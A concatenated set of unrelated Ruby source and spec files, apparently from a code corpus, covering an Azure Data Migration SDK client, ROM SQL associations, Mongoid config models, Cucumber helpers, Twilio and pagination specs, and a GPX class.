base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::ServiceSkuList.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Get services in resource group
#
# The Services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# resource group.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [DataMigrationServiceList] operation results.
#
def list_by_resource_group_next(next_page_link, custom_headers:nil)
response = list_by_resource_group_next_async(next_page_link, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Get services in resource group
#
# The Services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# resource group.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_by_resource_group_next_with_http_info(next_page_link, custom_headers:nil)
list_by_resource_group_next_async(next_page_link, custom_headers:custom_headers).value!
end
#
# Get services in resource group
#
# The Services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# resource group.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_by_resource_group_next_async(next_page_link, custom_headers:nil)
fail ArgumentError, 'next_page_link is nil' if next_page_link.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = '{nextLink}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
skip_encoding_path_params: {'nextLink' => next_page_link},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationServiceList.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Get services in subscription
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# subscription.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [DataMigrationServiceList] operation results.
#
def list_next(next_page_link, custom_headers:nil)
response = list_next_async(next_page_link, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Get services in subscription
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# subscription.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_next_with_http_info(next_page_link, custom_headers:nil)
list_next_async(next_page_link, custom_headers:custom_headers).value!
end
#
# Get services in subscription
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# subscription.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_next_async(next_page_link, custom_headers:nil)
fail ArgumentError, 'next_page_link is nil' if next_page_link.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = '{nextLink}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
skip_encoding_path_params: {'nextLink' => next_page_link},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationServiceList.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Get compatible SKUs
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The skus action returns the list of SKUs that a service
# resource can be updated to.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ServiceSkuList] which provide lazy access to pages of the response.
#
def list_skus_as_lazy(group_name, service_name, custom_headers:nil)
response = list_skus_async(group_name, service_name, custom_headers:custom_headers).value!
unless response.nil?
page = response.body
page.next_method = Proc.new do |next_page_link|
list_skus_next_async(next_page_link, custom_headers:custom_headers)
end
page
end
end
#
# Get services in resource group
#
# The Services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# resource group.
#
# @param group_name [String] Name of the resource group
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [DataMigrationServiceList] which provide lazy access to pages of the
# response.
#
def list_by_resource_group_as_lazy(group_name, custom_headers:nil)
response = list_by_resource_group_async(group_name, custom_headers:custom_headers).value!
unless response.nil?
page = response.body
page.next_method = Proc.new do |next_page_link|
list_by_resource_group_next_async(next_page_link, custom_headers:custom_headers)
end
page
end
end
#
# Get services in subscription
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# subscription.
#
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [DataMigrationServiceList] which provide lazy access to pages of the
# response.
#
def list_as_lazy(custom_headers:nil)
response = list_async(custom_headers:custom_headers).value!
unless response.nil?
page = response.body
page.next_method = Proc.new do |next_page_link|
list_next_async(next_page_link, custom_headers:custom_headers)
end
page
end
end
end
end
| 43.954825 | 160 | 0.700388 |
2831d757a8fcdf1fd5b0a2a33a253c64a3de4890 | 354 | module Sinatra
module DevopsServiceWeb
module Core
module Routing
module Key
def self.registered(app)
add = lambda do
submit { |http| http.post(host + '/v2.0/key', params) }
end
app.post '/key', &add
end
end
end
end
end
end
| 16.090909 | 69 | 0.468927 |
79f5daf1784bb7cb46a3717e0e75a97eeed222f5 | 181 | require 'solidus_core'
require 'solidus_support'
require 'solidus_papertrail/version'
require 'solidus_papertrail/engine'
require 'solidus_papertrail/railtie'
require 'paper_trail'
| 25.857143 | 36 | 0.850829 |
287cdf60ffef3a87afb9c75a65d5e092fc448a73 | 104 | require_relative "./literal"
module Dentaku
module AST
class Logical < Literal
end
end
end
| 11.555556 | 28 | 0.701923 |
d5f9ad9786b9d5840f73d4764b46d1b44ef6d3d9 | 2,227 | # frozen_string_literal: true
require "rom/associations/many_to_many"
require "rom/sql/associations/core"
require "rom/sql/associations/self_ref"
module ROM
module SQL
module Associations
class ManyToMany < ROM::Associations::ManyToMany
include Associations::Core
include Associations::SelfRef
# @api public
def call(target: self.target)
left = join_assoc.(target: target)
schema =
if left.schema.key?(foreign_key)
if target != self.target
target.schema.merge(join_schema)
else
left.schema.uniq.project(*columns)
end
else
target_schema
end.qualified
relation = left.join(source_table, join_keys)
if view
apply_view(schema, relation)
else
schema.(relation)
end
end
# @api public
def join(type, source = self.source, target = self.target)
through_assoc = source.associations[through]
# first we join source to intermediary
joined = through_assoc.join(type, source)
# then we join intermediary to target
target_ds = target.name.dataset
through_jk = through_assoc.target.associations[target_ds].join_keys
joined.__send__(type, target_ds, through_jk).qualified
end
# @api public
def join_keys
{ source_attr => target_attr }
end
# @api public
def target_attr
join_relation[target_key].qualified
end
# @api private
def persist(children, parents)
join_tuples = associate(children, parents)
join_relation.multi_insert(join_tuples)
end
private
# @api private
def target_schema
target.schema.merge(join_schema)
end
# @api private
def join_schema
join_relation.schema.project(foreign_key)
end
# @api private
def columns
target_schema.map(&:name)
end
memoize :join_keys, :target_schema, :join_schema, :columns
end
end
end
end
| 25.022472 | 77 | 0.582847 |
33d24c001670334ec5f0d641f29db3090d1d88eb | 780 | require 'spec_helper'
# TODO: is there anything to test?
# describe DeviseAction::New do
# # pending "add some examples to (or delete) #{__FILE__}"
# end
# describe DeviseAction::Confirmed do
# # pending "add some examples to (or delete) #{__FILE__}"
# end
# describe DeviseAction::Login do
# # pending "add some examples to (or delete) #{__FILE__}"
# end
# describe DeviseAction::Password do
# # pending "add some examples to (or delete) #{__FILE__}"
# end
# describe DeviseAction::Unlocked do
# # pending "add some examples to (or delete) #{__FILE__}"
# end
# describe DeviseAction::Edit do
# # pending "add some examples to (or delete) #{__FILE__}"
# end
# describe DeviseAction::Delete do
# # pending "add some examples to (or delete) #{__FILE__}"
# end
| 24.375 | 60 | 0.69359 |
4a5206bd0a4a32a3137c8b4ee997e78b9807aab2 | 3,893 | module Obscured
module AptWatcher
module Models
class Configuration
include Mongoid::Document
include Mongoid::Timestamps
store_in collection: 'configuration'
field :instance, type: String, :default => ''
field :setup_completed, type: Boolean, :default => false
field :user_registration, type: Boolean, :default => false
field :user_confirmation, type: Boolean, :default => false
index({ instance: 1 }, { background: true })
embeds_one :api, :class_name => 'Obscured::AptWatcher::Models::APIConfiguration', autobuild: true
embeds_one :slack, :class_name => 'Obscured::AptWatcher::Models::SlackConfiguration', autobuild: true
embeds_one :smtp, :class_name => 'Obscured::AptWatcher::Models::SMTPConfiguration', autobuild: true
embeds_one :raygun, :class_name => 'Obscured::AptWatcher::Models::RaygunConfiguration', autobuild: true
embeds_one :bitbucket, :class_name => 'Obscured::AptWatcher::Models::BitbucketConfiguration', autobuild: true
embeds_one :github, :class_name => 'Obscured::AptWatcher::Models::GitHubConfiguration', autobuild: true
validates_presence_of :api
validates_presence_of :slack
validates_presence_of :smtp
validates_presence_of :raygun
validates_presence_of :bitbucket
validates_presence_of :github
before_update do |document|
document.setup_completed = true
end
def self.make(opts)
if Configuration.where(:instance => opts[:instance]).exists?
raise Obscured::DomainError.new(:already_exists, what: 'Configuration does already exists!')
end
config = self.new
config
end
end
class APIConfiguration
include Mongoid::Document
field :username, type: String, :default => ''
field :password, type: String, :default => ''
embedded_in :configuration, autobuild: true
end
class SlackConfiguration
include Mongoid::Document
field :enabled, type: Boolean, :default => false
field :channel, type: String, :default => ''
field :icon, type: String, :default => ':slack:'
field :user, type: String, :default => 'AptWatcher'
field :webhook, type: String
embedded_in :configuration, autobuild: true
end
class SMTPConfiguration
include Mongoid::Document
field :enabled, type: Boolean, :default => false
field :domain, type: String, :default => ''
field :host, type: String, :default => 'smtp.sendgrid.net'
field :port, type: Integer, :default => 587
field :username, type: String
field :password, type: String
embedded_in :configuration, autobuild: true
end
class RaygunConfiguration
include Mongoid::Document
field :enabled, type: Boolean, :default => false
field :key, type: String
embedded_in :configuration, autobuild: true
end
class BitbucketConfiguration
include Mongoid::Document
field :enabled, type: Boolean, :default => false
field :key, type: String, :default => ''
field :secret, type: String, :default => ''
field :domains, type: String, :default => ''
embedded_in :configuration, autobuild: true
end
class GitHubConfiguration
include Mongoid::Document
field :enabled, type: Boolean, :default => false
field :key, type: String, :default => ''
field :secret, type: String, :default => ''
field :domains, type: String, :default => ''
embedded_in :configuration, autobuild: true
end
end
end
end | 34.451327 | 117 | 0.614436 |
87b22730eaf076281c09fa8a27d1944e3e8e1295 | 3,396 | require 'rubygems'
require 'tempfile'
require 'spec/expectations'
require 'fileutils'
require 'forwardable'
require 'cucumber/formatter/unicode'
class CucumberWorld
extend Forwardable
def_delegators CucumberWorld, :examples_dir, :self_test_dir, :working_dir, :cucumber_lib_dir
def self.examples_dir(subdir=nil)
@examples_dir ||= File.expand_path(File.join(File.dirname(__FILE__), '../../examples'))
subdir ? File.join(@examples_dir, subdir) : @examples_dir
end
def self.self_test_dir
@self_test_dir ||= examples_dir('self_test')
end
def self.working_dir
@working_dir ||= examples_dir('self_test/tmp')
end
def cucumber_lib_dir
@cucumber_lib_dir ||= File.expand_path(File.join(File.dirname(__FILE__), '../../lib'))
end
def initialize
@current_dir = self_test_dir
end
private
attr_reader :last_exit_status, :last_stderr
# The last standard out, with the duration line taken out (unpredictable)
def last_stdout
strip_1_9_paths(strip_duration(@last_stdout))
end
def strip_duration(s)
s.gsub(/^\d+m\d+\.\d+s\n/m, "")
end
def strip_1_9_paths(s)
s.gsub(/#{Dir.pwd}\/examples\/self_test\/tmp/m, ".").gsub(/#{Dir.pwd}\/examples\/self_test/m, ".")
end
def replace_duration(s, replacement)
s.gsub(/\d+m\d+\.\d+s/m, replacement)
end
def replace_junit_duration(s, replacement)
s.gsub(/\d+\.\d\d+/m, replacement)
end
def strip_ruby186_extra_trace(s)
s.gsub(/^.*\.\/features\/step_definitions(.*)\n/, "")
end
def create_file(file_name, file_content)
file_content.gsub!("CUCUMBER_LIB", "'#{cucumber_lib_dir}'") # Some files, such as Rakefiles need to use the lib dir
in_current_dir do
FileUtils.mkdir_p(File.dirname(file_name)) unless File.directory?(File.dirname(file_name))
File.open(file_name, 'w') { |f| f << file_content }
end
end
def set_env_var(variable, value)
@original_env_vars ||= {}
@original_env_vars[variable] = ENV[variable]
ENV[variable] = value
end
def background_jobs
@background_jobs ||= []
end
def in_current_dir(&block)
Dir.chdir(@current_dir, &block)
end
def run(command)
stderr_file = Tempfile.new('cucumber')
stderr_file.close
in_current_dir do
mode = Cucumber::RUBY_1_9 ? {:external_encoding=>"UTF-8"} : 'r'
IO.popen("#{command} 2> #{stderr_file.path}", mode) do |io|
@last_stdout = io.read
end
@last_exit_status = $?.exitstatus
end
@last_stderr = IO.read(stderr_file.path)
end
def run_spork_in_background(port = nil)
require 'spork'
pid = fork
in_current_dir do
if pid
background_jobs << pid
else
# STDOUT.close
# STDERR.close
port_arg = port ? "-p #{port}" : ''
cmd = "#{Cucumber::RUBY_BINARY} -I #{Cucumber::LIBDIR} #{Spork::BINARY} cuc #{port_arg}"
exec cmd
end
end
sleep 1.0
end
def terminate_background_jobs
background_jobs.each do |pid|
Process.kill(Signal.list['TERM'], pid)
end
end
def restore_original_env_vars
@original_env_vars.each { |variable, value| ENV[variable] = value } if @original_env_vars
end
end
World do
CucumberWorld.new
end
Before do
FileUtils.rm_rf CucumberWorld.working_dir
FileUtils.mkdir CucumberWorld.working_dir
end
After do
terminate_background_jobs
restore_original_env_vars
end
| 24.257143 | 119 | 0.679918 |
bf961204f7bdcd8287aec8a690d1c24eb4eb9b41 | 41 | class Continent < ActiveRecord::Base
end | 13.666667 | 36 | 0.804878 |
f857468d5e444311f619afa5c4411a16d61463f8 | 60 | module Gollum
module Auth
VERSION = '0.0.1'
end
end
| 10 | 21 | 0.633333 |
e2543803c06b432461a4a01c36525d47d1d86d83 | 1,241 | require 'test_helper'
class AlbumTest < ActiveSupport::TestCase
fixtures :albums
# Replace this with your real tests.
test "the truth" do
assert true
end
test "Finds and links parent place" do
album = albums(:columbia)
album.set_places(album.title, album.description)
end
test "Find and link all mentioned places" do
album = albums(:columbia)
album.set_links
assert_equal 11, album.places_mentioned.length
assert !album.places_mentioned.find_by_name("Wales Peak").nil?
assert album.places_mentioned.find_by_name("Chaba Peak") != []
assert album.places_mentioned.find_by_name("Mount Clemeneau") != []
assert album.places_mentioned.find_by_name("False Chaba Peak") != []
assert album.places_mentioned.find_by_name("Listening Mountain") != []
assert album.places_mentioned.find_by_name("Sundial Mountain") != []
assert album.places_mentioned.find_by_name("Sundial E4") != []
assert album.places_mentioned.find_by_name("Mount Hooker") != []
assert album.places_mentioned.find_by_name("Serenity Mountain") != []
assert album.places_mentioned.find_by_name("Warwick Mountain") != []
assert album.places_mentioned.find_by_name("Dais Mountain") != []
end
end
| 36.5 | 74 | 0.727639 |
0390299efc54b829ceea993249e216780f92f697 | 294 | # frozen_string_literal: true
module LastbillClient
module Error
# @author [email protected]
# 404 error sent by Lastbill server
class NotFound < Generic
def initialize(msg = "404 Not Found")
super(status: :not_found, message: msg)
end
end
end
end
| 21 | 47 | 0.676871 |
bbcc5c6ecb09b4646f9f5f2d2d76f170cbe582bd | 8,628 | ##
# This code was generated by
# \ / _ _ _| _ _
# | (_)\/(_)(_|\/| |(/_ v1.0.0
# / /
#
# frozen_string_literal: true
require 'spec_helper.rb'
describe 'Certificate' do
it "can fetch" do
@holodeck.mock(Twilio::Response.new(500, ''))
expect {
@client.preview.deployed_devices.fleets('FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
.certificates('CYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX').fetch()
}.to raise_exception(Twilio::REST::TwilioError)
expect(
@holodeck.has_request?(Holodeck::Request.new(
method: 'get',
url: 'https://preview.twilio.com/DeployedDevices/Fleets/FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Certificates/CYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))).to eq(true)
end
it "receives fetch responses" do
@holodeck.mock(Twilio::Response.new(
200,
%q[
{
"sid": "CYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "friendly_name",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"fleet_sid": "FLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"device_sid": "THaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"thumbprint": "1234567890",
"date_created": "2016-07-30T20:00:00Z",
"date_updated": null,
"url": "https://preview.twilio.com/DeployedDevices/Fleets/FLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Certificates/CYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
]
))
actual = @client.preview.deployed_devices.fleets('FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
.certificates('CYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX').fetch()
expect(actual).to_not eq(nil)
end
it "can delete" do
@holodeck.mock(Twilio::Response.new(500, ''))
expect {
@client.preview.deployed_devices.fleets('FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
.certificates('CYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX').delete()
}.to raise_exception(Twilio::REST::TwilioError)
expect(
@holodeck.has_request?(Holodeck::Request.new(
method: 'delete',
url: 'https://preview.twilio.com/DeployedDevices/Fleets/FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Certificates/CYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))).to eq(true)
end
it "receives delete responses" do
@holodeck.mock(Twilio::Response.new(
204,
nil,
))
actual = @client.preview.deployed_devices.fleets('FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
.certificates('CYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX').delete()
expect(actual).to eq(true)
end
it "can create" do
@holodeck.mock(Twilio::Response.new(500, ''))
expect {
@client.preview.deployed_devices.fleets('FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
.certificates.create(certificate_data: 'certificate_data')
}.to raise_exception(Twilio::REST::TwilioError)
values = {'CertificateData' => 'certificate_data', }
expect(
@holodeck.has_request?(Holodeck::Request.new(
method: 'post',
url: 'https://preview.twilio.com/DeployedDevices/Fleets/FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Certificates',
data: values,
))).to eq(true)
end
it "receives create responses" do
@holodeck.mock(Twilio::Response.new(
201,
%q[
{
"sid": "CYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "friendly_name",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"fleet_sid": "FLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"device_sid": "THaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"thumbprint": "1234567890",
"date_created": "2016-07-30T20:00:00Z",
"date_updated": null,
"url": "https://preview.twilio.com/DeployedDevices/Fleets/FLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Certificates/CYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
]
))
actual = @client.preview.deployed_devices.fleets('FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
.certificates.create(certificate_data: 'certificate_data')
expect(actual).to_not eq(nil)
end
it "can read" do
@holodeck.mock(Twilio::Response.new(500, ''))
expect {
@client.preview.deployed_devices.fleets('FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
.certificates.list()
}.to raise_exception(Twilio::REST::TwilioError)
expect(
@holodeck.has_request?(Holodeck::Request.new(
method: 'get',
url: 'https://preview.twilio.com/DeployedDevices/Fleets/FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Certificates',
))).to eq(true)
end
it "receives read_empty responses" do
@holodeck.mock(Twilio::Response.new(
200,
%q[
{
"certificates": [],
"meta": {
"first_page_url": "https://preview.twilio.com/DeployedDevices/Fleets/FLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Certificates?PageSize=50&Page=0",
"key": "certificates",
"next_page_url": null,
"page": 0,
"page_size": 50,
"previous_page_url": null,
"url": "https://preview.twilio.com/DeployedDevices/Fleets/FLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Certificates?PageSize=50&Page=0"
}
}
]
))
actual = @client.preview.deployed_devices.fleets('FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
.certificates.list()
expect(actual).to_not eq(nil)
end
it "receives read_full responses" do
@holodeck.mock(Twilio::Response.new(
200,
%q[
{
"certificates": [
{
"sid": "CYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "friendly_name",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"fleet_sid": "FLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"device_sid": "THaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"thumbprint": "1234567890",
"date_created": "2016-07-30T20:00:00Z",
"date_updated": null,
"url": "https://preview.twilio.com/DeployedDevices/Fleets/FLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Certificates/CYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
],
"meta": {
"first_page_url": "https://preview.twilio.com/DeployedDevices/Fleets/FLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Certificates?PageSize=50&Page=0",
"key": "certificates",
"next_page_url": null,
"page": 0,
"page_size": 50,
"previous_page_url": null,
"url": "https://preview.twilio.com/DeployedDevices/Fleets/FLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Certificates?PageSize=50&Page=0"
}
}
]
))
actual = @client.preview.deployed_devices.fleets('FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
.certificates.list()
expect(actual).to_not eq(nil)
end
it "can update" do
@holodeck.mock(Twilio::Response.new(500, ''))
expect {
@client.preview.deployed_devices.fleets('FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
.certificates('CYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX').update()
}.to raise_exception(Twilio::REST::TwilioError)
expect(
@holodeck.has_request?(Holodeck::Request.new(
method: 'post',
url: 'https://preview.twilio.com/DeployedDevices/Fleets/FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Certificates/CYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))).to eq(true)
end
it "receives update responses" do
@holodeck.mock(Twilio::Response.new(
200,
%q[
{
"sid": "CYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "friendly_name",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"fleet_sid": "FLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"device_sid": "THaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"thumbprint": "1234567890",
"date_created": "2016-07-30T20:00:00Z",
"date_updated": "2016-07-30T20:00:00Z",
"url": "https://preview.twilio.com/DeployedDevices/Fleets/FLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Certificates/CYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
]
))
actual = @client.preview.deployed_devices.fleets('FLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
.certificates('CYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX').update()
expect(actual).to_not eq(nil)
end
end | 36.871795 | 159 | 0.626796 |
e83245e33b10b32a31a87a959c01efe041487410 | 709 | # frozen_string_literal: true
module Vamoos
class PointOfInterest < Api
attr_accessor :id, :country, :country_iso, :created_at, :description, :icon, :icon_id,
:is_default_on, :latitude, :longitude, :meta, :name, :operator_id, :poi_range,
:updated_at
def initialize(params)
params.each { |key, value| send "#{key}=", value }
end
class << self
def create!(params)
result = post_json('/poi', { body: params.to_json })
new(result.parsed_response)
end
def update!(poi_id, params)
result = put_json("/poi/#{poi_id}", { body: params.to_json })
new(result.parsed_response)
end
end
end
end
| 25.321429 | 96 | 0.603667 |
08e4c619feb595de073da0f7b2950c4edf54fa51 | 3,119 | require 'spec_helper'
require 'support/shared_examples/existing_headers'
require 'support/shared_examples/first_page'
require 'support/shared_examples/middle_page'
require 'support/shared_examples/last_page'
describe NumbersAPI do
describe 'GET #index' do
let(:links) { last_response.headers['Link'].split(', ') }
let(:total) { last_response.headers['Total'].to_i }
let(:per_page) { last_response.headers['Per-Page'].to_i }
context 'without enough items to give more than one page' do
before { get '/numbers', :count => 10 }
it 'should not paginate' do
expect(last_response.headers.keys).not_to include('Link')
end
it 'should give a Total header' do
expect(total).to eq(10)
end
it 'should give a Per-Page header' do
expect(per_page).to eq(10)
end
it 'should list all numbers in the response body' do
body = '[1,2,3,4,5,6,7,8,9,10]'
expect(last_response.body).to eq(body)
end
end
context 'with existing Link headers' do
before { get '/numbers', :count => 30, :with_headers => true }
it_behaves_like 'an endpoint with existing Link headers'
end
context 'with enough items to paginate' do
context 'when on the first page' do
before { get '/numbers', :count => 100 }
it_behaves_like 'an endpoint with a first page'
end
context 'when on the last page' do
before { get '/numbers', :count => 100, :page => 10 }
it_behaves_like 'an endpoint with a last page'
end
context 'when somewhere comfortably in the middle' do
before { get '/numbers', :count => 100, :page => 2 }
it_behaves_like 'an endpoint with a middle page'
end
context 'with a max_per_page setting' do
before { get '/numbers', :count => 100, :per_page => 30 }
it 'should not go above the max_per_page_limit' do
body = '[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25]'
expect(last_response.body).to eq(body)
end
end
end
context 'with custom response headers' do
before do
ApiPagination.config.total_header = 'X-Total-Count'
ApiPagination.config.per_page_header = 'X-Per-Page'
get '/numbers', count: 10
end
after do
ApiPagination.config.total_header = 'Total'
ApiPagination.config.per_page_header = 'Per-Page'
end
let(:total) { last_response.header['X-Total-Count'].to_i }
let(:per_page) { last_response.header['X-Per-Page'].to_i }
it 'should give a X-Total-Count header' do
headers_keys = last_response.headers.keys
expect(headers_keys).not_to include('Total')
expect(headers_keys).to include('X-Total-Count')
expect(total).to eq(10)
end
it 'should give a X-Per-Page header' do
headers_keys = last_response.headers.keys
expect(headers_keys).not_to include('Per-Page')
expect(headers_keys).to include('X-Per-Page')
expect(per_page).to eq(10)
end
end
end
end
| 29.990385 | 86 | 0.631613 |
3315471d1e7e899768fd8cbc92a140ddbd370e9e | 12,377 | module GPX
class GPXFile < Base
attr_accessor :tracks,
:routes, :waypoints, :bounds, :lowest_point, :highest_point, :duration, :ns, :time, :name, :version, :creator, :description, :moving_duration
